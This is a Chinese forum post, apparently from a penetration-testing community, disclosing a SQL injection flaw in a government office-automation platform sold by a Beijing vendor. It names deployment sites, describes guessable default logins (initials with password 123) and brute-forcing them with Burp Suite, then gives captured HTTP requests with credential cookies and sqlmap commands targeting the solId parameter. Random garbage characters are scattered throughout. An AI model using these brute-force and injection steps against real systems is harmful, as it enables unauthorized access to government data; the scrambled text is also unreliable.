$ U O& L; a/ s, R: S
平台简介:: P- W0 H; E, O1 C A) |
" a* U* h; f7 X" d" C3 Q& j9 V$ @; }( v3 g : N$ k" I$ a) O
8 D' h: G1 [' u* i4 O3 M4 G6 ]: e
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
$ _) ]# E6 ?3 [5 k7 \
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
9 U4 S, c9 d- E# I
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
2 @" N- Q; Q1 ^; B: D! q# C
- b) f/ G' B4 X9 R由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:% L$ S" G6 ]' T0 O$ o
3 H; ?, E% D4 W1 S! C% [. x. q% _1 y* N, H6 ] ?6 s6 @. Y
; k8 _, t& W6 O5 S/ n http://1.1.1.1:7197/cap-aco/#(案例2-)
: w) g n- w8 V) R, F3 ~http://www.XXOO.com (案例1-官网网站)
/ V2 n1 v6 m/ e( C( M) u, C- u
: [5 s5 R! _$ p: X漏洞详情:7 ? q7 B4 |! H' K! @1 [- |/ x% w2 N
8 L0 G, u- K% M$ n1 j, K0 p7 f 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
: P/ |, D6 O3 K% k! U/ b! ]( g首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:" {* [) y9 m' D. k( s
. T0 ~; m% z; j: y0 x: U
2 t( Q3 K8 D" U* @$ t( Y% v* k
4 w4 i; _ Y. Y4 A status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:5 c5 C' V% p6 f$ {3 T
: K" v7 u( ^' d$ Z e9 z1、案例1-官方网站: G* k$ H$ o9 Z5 [$ H
4 B5 o% U' ? m* r/ } oGET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
7 a9 R% ?0 y! H Host: www.XXOO.com7 X- a* V8 O* s
! i0 ?, L& f5 m% M' u Proxy-Connection: Keep-Alive
) m$ G$ {6 O7 D8 R# P+ q+ EAccept: application/json, text/javascript, */*; q=0.01' m( J) x- d9 l- O) R/ k8 q
+ l* x6 R$ v5 [% I. Y; c) ~_% K+ {! V. r0 w/ q8 ~) S P Accept-Language: zh-CN
/ I" _' T6 d: u( m( x( O" n) M4 MContent-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
X-Requested-With: XMLHttpRequest
' _2 q+ R/ k+ ^' h5 a9 n& h: V$ }# q$ ?/ k0 Y( Z Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002/ V/ ^ p0 @1 P
! w1 u8 g# x" R. _% f' h& WAccept-Encoding: gzip, deflate, sdch
8 A6 L; X2 F; X. z2 DCookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e0 B1 @; l4 P$ s+ c$ m7 Q5 n3 n4 N
# Z5 m7 X# W- Y X9 A3 _ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:8 b0 X, ^. d; ]; O5 J3 y! ?. B
5 O) D0 G3 k' X X3 {
. z- Z3 W; H/ j, D. `
D! G) T. V& k7 a
, ^9 {: U8 _) W! W0 f/ U2 g
$ S3 e% x& ~& y/ J7 Q* @0 c
+ l! [5 H& _, F' u( h- O
2、案例2-某天河云平台
+ ?# _* ], T6 e& X( w5 w- I) _3 VGET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
/ Z) q% Q# }6 S5 r" } Host: 1.1.1.:7197
9 V1 q7 h" ?1 `0 N& m! `: C5 ] Accept: application/json, text/javascript, */*; q=0.01$ J, a) ]' `6 I' b
6 |) b7 k' z4 l {5 I! I I6 S8 S X-Requested-With: XMLHttpRequest
& R8 m7 h7 F N& }/ @ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
; B* f; O& H5 H7 d8 \5 N; D; M Content-Type: application/json
3 c8 U% ]" O" K2 `8 E5 r Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
Accept-Language: zh-CN,zh;q=0.8
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=16 d6 @* l& r9 b3 b- H# A. S4 l2 k
Connection: close
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:) r7 h! ? i9 e
4 x$ K2 G5 H4 V$ ^$ p/ a4 a( {7 \, l- `% n7 F. M+ \
3 f r; T Q+ l# ]" c
" R1 w$ |8 _* G8 A2 }# A
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |